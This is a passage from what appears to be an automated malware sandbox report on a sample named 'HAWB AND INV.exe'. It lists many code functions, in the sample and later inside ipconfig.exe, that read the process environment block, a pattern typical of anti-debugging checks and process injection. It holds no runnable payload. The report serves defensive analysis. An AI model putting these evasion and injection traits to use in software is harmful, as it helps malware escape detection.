          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011E8A0A mov eax, dword ptr fs:[00000030h]10_2_011E8A0A
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0129AA16 mov eax, dword ptr fs:[00000030h]10_2_0129AA16
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0129AA16 mov eax, dword ptr fs:[00000030h]10_2_0129AA16
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0128B260 mov eax, dword ptr fs:[00000030h]10_2_0128B260
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0128B260 mov eax, dword ptr fs:[00000030h]10_2_0128B260
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012A8A62 mov eax, dword ptr fs:[00000030h]10_2_012A8A62
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0121927A mov eax, dword ptr fs:[00000030h]10_2_0121927A
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011D9240 mov eax, dword ptr fs:[00000030h]10_2_011D9240
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011D9240 mov eax, dword ptr fs:[00000030h]10_2_011D9240
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011D9240 mov eax, dword ptr fs:[00000030h]10_2_011D9240
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011D9240 mov eax, dword ptr fs:[00000030h]10_2_011D9240
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01264257 mov eax, dword ptr fs:[00000030h]10_2_01264257
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0129EA55 mov eax, dword ptr fs:[00000030h]10_2_0129EA55
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0120FAB0 mov eax, dword ptr fs:[00000030h]10_2_0120FAB0
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011EAAB0 mov eax, dword ptr fs:[00000030h]10_2_011EAAB0
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011EAAB0 mov eax, dword ptr fs:[00000030h]10_2_011EAAB0
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0120D294 mov eax, dword ptr fs:[00000030h]10_2_0120D294
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0120D294 mov eax, dword ptr fs:[00000030h]10_2_0120D294
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011D52A5 mov eax, dword ptr fs:[00000030h]10_2_011D52A5
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011D52A5 mov eax, dword ptr fs:[00000030h]10_2_011D52A5
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011D52A5 mov eax, dword ptr fs:[00000030h]10_2_011D52A5
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011D52A5 mov eax, dword ptr fs:[00000030h]10_2_011D52A5
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011D52A5 mov eax, dword ptr fs:[00000030h]10_2_011D52A5
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01202AE4 mov eax, dword ptr fs:[00000030h]10_2_01202AE4
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01202ACB mov eax, dword ptr fs:[00000030h]10_2_01202ACB
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0129E539 mov eax, dword ptr fs:[00000030h]10_2_0129E539
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0125A537 mov eax, dword ptr fs:[00000030h]10_2_0125A537
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01204D3B mov eax, dword ptr fs:[00000030h]10_2_01204D3B
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01204D3B mov eax, dword ptr fs:[00000030h]10_2_01204D3B
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01204D3B mov eax, dword ptr fs:[00000030h]10_2_01204D3B
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012A8D34 mov eax, dword ptr fs:[00000030h]10_2_012A8D34
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011E3D34 mov eax, dword ptr fs:[00000030h]10_2_011E3D34
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011E3D34 mov eax, dword ptr fs:[00000030h]10_2_011E3D34
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011E3D34 mov eax, dword ptr fs:[00000030h]10_2_011E3D34
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011E3D34 mov eax, dword ptr fs:[00000030h]10_2_011E3D34
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011E3D34 mov eax, dword ptr fs:[00000030h]10_2_011E3D34
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011E3D34 mov eax, dword ptr fs:[00000030h]10_2_011E3D34
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011E3D34 mov eax, dword ptr fs:[00000030h]10_2_011E3D34
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011E3D34 mov eax, dword ptr fs:[00000030h]10_2_011E3D34
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011E3D34 mov eax, dword ptr fs:[00000030h]10_2_011E3D34
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011E3D34 mov eax, dword ptr fs:[00000030h]10_2_011E3D34
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011E3D34 mov eax, dword ptr fs:[00000030h]10_2_011E3D34
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011E3D34 mov eax, dword ptr fs:[00000030h]10_2_011E3D34
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011E3D34 mov eax, dword ptr fs:[00000030h]10_2_011E3D34
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011DAD30 mov eax, dword ptr fs:[00000030h]10_2_011DAD30
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011F7D50 mov eax, dword ptr fs:[00000030h]10_2_011F7D50
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01213D43 mov eax, dword ptr fs:[00000030h]10_2_01213D43
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01253540 mov eax, dword ptr fs:[00000030h]10_2_01253540
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011FC577 mov eax, dword ptr fs:[00000030h]10_2_011FC577
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011FC577 mov eax, dword ptr fs:[00000030h]10_2_011FC577
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012035A1 mov eax, dword ptr fs:[00000030h]10_2_012035A1
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012A05AC mov eax, dword ptr fs:[00000030h]10_2_012A05AC
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012A05AC mov eax, dword ptr fs:[00000030h]10_2_012A05AC
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01201DB5 mov eax, dword ptr fs:[00000030h]10_2_01201DB5
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01201DB5 mov eax, dword ptr fs:[00000030h]10_2_01201DB5
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01201DB5 mov eax, dword ptr fs:[00000030h]10_2_01201DB5
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011D2D8A mov eax, dword ptr fs:[00000030h]10_2_011D2D8A
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011D2D8A mov eax, dword ptr fs:[00000030h]10_2_011D2D8A
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011D2D8A mov eax, dword ptr fs:[00000030h]10_2_011D2D8A
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011D2D8A mov eax, dword ptr fs:[00000030h]10_2_011D2D8A
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011D2D8A mov eax, dword ptr fs:[00000030h]10_2_011D2D8A
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01202581 mov eax, dword ptr fs:[00000030h]10_2_01202581
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01202581 mov eax, dword ptr fs:[00000030h]10_2_01202581
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01202581 mov eax, dword ptr fs:[00000030h]10_2_01202581
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01202581 mov eax, dword ptr fs:[00000030h]10_2_01202581
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0120FD9B mov eax, dword ptr fs:[00000030h]10_2_0120FD9B
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0120FD9B mov eax, dword ptr fs:[00000030h]10_2_0120FD9B
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0129FDE2 mov eax, dword ptr fs:[00000030h]10_2_0129FDE2
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0129FDE2 mov eax, dword ptr fs:[00000030h]10_2_0129FDE2
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0129FDE2 mov eax, dword ptr fs:[00000030h]10_2_0129FDE2
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0129FDE2 mov eax, dword ptr fs:[00000030h]10_2_0129FDE2
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01288DF1 mov eax, dword ptr fs:[00000030h]10_2_01288DF1
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01256DC9 mov eax, dword ptr fs:[00000030h]10_2_01256DC9
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01256DC9 mov eax, dword ptr fs:[00000030h]10_2_01256DC9
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01256DC9 mov eax, dword ptr fs:[00000030h]10_2_01256DC9
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01256DC9 mov ecx, dword ptr fs:[00000030h]10_2_01256DC9
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01256DC9 mov eax, dword ptr fs:[00000030h]10_2_01256DC9
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01256DC9 mov eax, dword ptr fs:[00000030h]10_2_01256DC9
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011ED5E0 mov eax, dword ptr fs:[00000030h]10_2_011ED5E0
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011ED5E0 mov eax, dword ptr fs:[00000030h]10_2_011ED5E0
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0120BC2C mov eax, dword ptr fs:[00000030h]10_2_0120BC2C
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012A740D mov eax, dword ptr fs:[00000030h]10_2_012A740D
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012A740D mov eax, dword ptr fs:[00000030h]10_2_012A740D
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012A740D mov eax, dword ptr fs:[00000030h]10_2_012A740D
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01291C06 mov eax, dword ptr fs:[00000030h]10_2_01291C06
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01291C06 mov eax, dword ptr fs:[00000030h]10_2_01291C06
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01291C06 mov eax, dword ptr fs:[00000030h]10_2_01291C06
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01291C06 mov eax, dword ptr fs:[00000030h]10_2_01291C06
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01291C06 mov eax, dword ptr fs:[00000030h]10_2_01291C06
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01291C06 mov eax, dword ptr fs:[00000030h]10_2_01291C06
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01291C06 mov eax, dword ptr fs:[00000030h]10_2_01291C06
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01291C06 mov eax, dword ptr fs:[00000030h]10_2_01291C06
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01291C06 mov eax, dword ptr fs:[00000030h]10_2_01291C06
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01291C06 mov eax, dword ptr fs:[00000030h]10_2_01291C06
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01291C06 mov eax, dword ptr fs:[00000030h]10_2_01291C06
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01291C06 mov eax, dword ptr fs:[00000030h]10_2_01291C06
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01291C06 mov eax, dword ptr fs:[00000030h]10_2_01291C06
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01291C06 mov eax, dword ptr fs:[00000030h]10_2_01291C06
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01256C0A mov eax, dword ptr fs:[00000030h]10_2_01256C0A
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01256C0A mov eax, dword ptr fs:[00000030h]10_2_01256C0A
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01256C0A mov eax, dword ptr fs:[00000030h]10_2_01256C0A
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01256C0A mov eax, dword ptr fs:[00000030h]10_2_01256C0A
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0120A44B mov eax, dword ptr fs:[00000030h]10_2_0120A44B
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011F746D mov eax, dword ptr fs:[00000030h]10_2_011F746D
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0126C450 mov eax, dword ptr fs:[00000030h]10_2_0126C450
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0126C450 mov eax, dword ptr fs:[00000030h]10_2_0126C450
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011E849B mov eax, dword ptr fs:[00000030h]10_2_011E849B
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012914FB mov eax, dword ptr fs:[00000030h]10_2_012914FB
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01256CF0 mov eax, dword ptr fs:[00000030h]10_2_01256CF0
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01256CF0 mov eax, dword ptr fs:[00000030h]10_2_01256CF0
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01256CF0 mov eax, dword ptr fs:[00000030h]10_2_01256CF0
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012A8CD6 mov eax, dword ptr fs:[00000030h]10_2_012A8CD6
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011FF716 mov eax, dword ptr fs:[00000030h]10_2_011FF716
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0120E730 mov eax, dword ptr fs:[00000030h]10_2_0120E730
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012A070D mov eax, dword ptr fs:[00000030h]10_2_012A070D
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012A070D mov eax, dword ptr fs:[00000030h]10_2_012A070D
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0120A70E mov eax, dword ptr fs:[00000030h]10_2_0120A70E
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0120A70E mov eax, dword ptr fs:[00000030h]10_2_0120A70E
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011D4F2E mov eax, dword ptr fs:[00000030h]10_2_011D4F2E
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011D4F2E mov eax, dword ptr fs:[00000030h]10_2_011D4F2E
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0126FF10 mov eax, dword ptr fs:[00000030h]10_2_0126FF10
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0126FF10 mov eax, dword ptr fs:[00000030h]10_2_0126FF10
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012A8F6A mov eax, dword ptr fs:[00000030h]10_2_012A8F6A
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011EEF40 mov eax, dword ptr fs:[00000030h]10_2_011EEF40
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011EFF60 mov eax, dword ptr fs:[00000030h]10_2_011EFF60
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011E8794 mov eax, dword ptr fs:[00000030h]10_2_011E8794
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01257794 mov eax, dword ptr fs:[00000030h]10_2_01257794
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01257794 mov eax, dword ptr fs:[00000030h]10_2_01257794
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01257794 mov eax, dword ptr fs:[00000030h]10_2_01257794
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012137F5 mov eax, dword ptr fs:[00000030h]10_2_012137F5
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0128FE3F mov eax, dword ptr fs:[00000030h]10_2_0128FE3F
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011DC600 mov eax, dword ptr fs:[00000030h]10_2_011DC600
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011DC600 mov eax, dword ptr fs:[00000030h]10_2_011DC600
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011DC600 mov eax, dword ptr fs:[00000030h]10_2_011DC600
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01208E00 mov eax, dword ptr fs:[00000030h]10_2_01208E00
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01291608 mov eax, dword ptr fs:[00000030h]10_2_01291608
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0120A61C mov eax, dword ptr fs:[00000030h]10_2_0120A61C
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0120A61C mov eax, dword ptr fs:[00000030h]10_2_0120A61C
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011DE620 mov eax, dword ptr fs:[00000030h]10_2_011DE620
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011E7E41 mov eax, dword ptr fs:[00000030h]10_2_011E7E41
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011E7E41 mov eax, dword ptr fs:[00000030h]10_2_011E7E41
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011E7E41 mov eax, dword ptr fs:[00000030h]10_2_011E7E41
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011E7E41 mov eax, dword ptr fs:[00000030h]10_2_011E7E41
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011E7E41 mov eax, dword ptr fs:[00000030h]10_2_011E7E41
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011E7E41 mov eax, dword ptr fs:[00000030h]10_2_011E7E41
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011FAE73 mov eax, dword ptr fs:[00000030h]10_2_011FAE73
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011FAE73 mov eax, dword ptr fs:[00000030h]10_2_011FAE73
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011FAE73 mov eax, dword ptr fs:[00000030h]10_2_011FAE73
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011FAE73 mov eax, dword ptr fs:[00000030h]10_2_011FAE73
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011FAE73 mov eax, dword ptr fs:[00000030h]10_2_011FAE73
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0129AE44 mov eax, dword ptr fs:[00000030h]10_2_0129AE44
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0129AE44 mov eax, dword ptr fs:[00000030h]10_2_0129AE44
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011E766D mov eax, dword ptr fs:[00000030h]10_2_011E766D
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012546A7 mov eax, dword ptr fs:[00000030h]10_2_012546A7
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012A0EA5 mov eax, dword ptr fs:[00000030h]10_2_012A0EA5
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012A0EA5 mov eax, dword ptr fs:[00000030h]10_2_012A0EA5
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012A0EA5 mov eax, dword ptr fs:[00000030h]10_2_012A0EA5
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0126FE87 mov eax, dword ptr fs:[00000030h]10_2_0126FE87
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012016E0 mov ecx, dword ptr fs:[00000030h]10_2_012016E0
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01218EC7 mov eax, dword ptr fs:[00000030h]10_2_01218EC7
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0128FEC0 mov eax, dword ptr fs:[00000030h]10_2_0128FEC0
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012036CC mov eax, dword ptr fs:[00000030h]10_2_012036CC
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012A8ED6 mov eax, dword ptr fs:[00000030h]10_2_012A8ED6
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011E76E2 mov eax, dword ptr fs:[00000030h]10_2_011E76E2
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B0FAB0 mov eax, dword ptr fs:[00000030h]23_2_02B0FAB0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AD52A5 mov eax, dword ptr fs:[00000030h]23_2_02AD52A5
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AD52A5 mov eax, dword ptr fs:[00000030h]23_2_02AD52A5
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AD52A5 mov eax, dword ptr fs:[00000030h]23_2_02AD52A5
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AD52A5 mov eax, dword ptr fs:[00000030h]23_2_02AD52A5
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AD52A5 mov eax, dword ptr fs:[00000030h]23_2_02AD52A5
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AEAAB0 mov eax, dword ptr fs:[00000030h]23_2_02AEAAB0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AEAAB0 mov eax, dword ptr fs:[00000030h]23_2_02AEAAB0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B0D294 mov eax, dword ptr fs:[00000030h]23_2_02B0D294
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B0D294 mov eax, dword ptr fs:[00000030h]23_2_02B0D294
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B02AE4 mov eax, dword ptr fs:[00000030h]23_2_02B02AE4
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B02ACB mov eax, dword ptr fs:[00000030h]23_2_02B02ACB
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B14A2C mov eax, dword ptr fs:[00000030h]23_2_02B14A2C
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B14A2C mov eax, dword ptr fs:[00000030h]23_2_02B14A2C
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AE8A0A mov eax, dword ptr fs:[00000030h]23_2_02AE8A0A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B9AA16 mov eax, dword ptr fs:[00000030h]23_2_02B9AA16
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B9AA16 mov eax, dword ptr fs:[00000030h]23_2_02B9AA16
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AF3A1C mov eax, dword ptr fs:[00000030h]23_2_02AF3A1C
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02ADAA16 mov eax, dword ptr fs:[00000030h]23_2_02ADAA16
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02ADAA16 mov eax, dword ptr fs:[00000030h]23_2_02ADAA16
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AD5210 mov eax, dword ptr fs:[00000030h]23_2_02AD5210
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AD5210 mov ecx, dword ptr fs:[00000030h]23_2_02AD5210
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AD5210 mov eax, dword ptr fs:[00000030h]23_2_02AD5210
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AD5210 mov eax, dword ptr fs:[00000030h]23_2_02AD5210
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B1927A mov eax, dword ptr fs:[00000030h]23_2_02B1927A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B8B260 mov eax, dword ptr fs:[00000030h]23_2_02B8B260
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B8B260 mov eax, dword ptr fs:[00000030h]23_2_02B8B260
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02BA8A62 mov eax, dword ptr fs:[00000030h]23_2_02BA8A62
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B64257 mov eax, dword ptr fs:[00000030h]23_2_02B64257
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B9EA55 mov eax, dword ptr fs:[00000030h]23_2_02B9EA55
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AD9240 mov eax, dword ptr fs:[00000030h]23_2_02AD9240
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AD9240 mov eax, dword ptr fs:[00000030h]23_2_02AD9240
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AD9240 mov eax, dword ptr fs:[00000030h]23_2_02AD9240
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AD9240 mov eax, dword ptr fs:[00000030h]23_2_02AD9240
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B04BAD mov eax, dword ptr fs:[00000030h]23_2_02B04BAD
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B04BAD mov eax, dword ptr fs:[00000030h]23_2_02B04BAD
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B04BAD mov eax, dword ptr fs:[00000030h]23_2_02B04BAD
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02BA5BA5 mov eax, dword ptr fs:[00000030h]23_2_02BA5BA5
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B0B390 mov eax, dword ptr fs:[00000030h]23_2_02B0B390
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AE1B8F mov eax, dword ptr fs:[00000030h]23_2_02AE1B8F
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AE1B8F mov eax, dword ptr fs:[00000030h]23_2_02AE1B8F
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B02397 mov eax, dword ptr fs:[00000030h]23_2_02B02397
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B9138A mov eax, dword ptr fs:[00000030h]23_2_02B9138A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B8D380 mov ecx, dword ptr fs:[00000030h]23_2_02B8D380
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AFDBE9 mov eax, dword ptr fs:[00000030h]23_2_02AFDBE9
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B003E2 mov eax, dword ptr fs:[00000030h]23_2_02B003E2
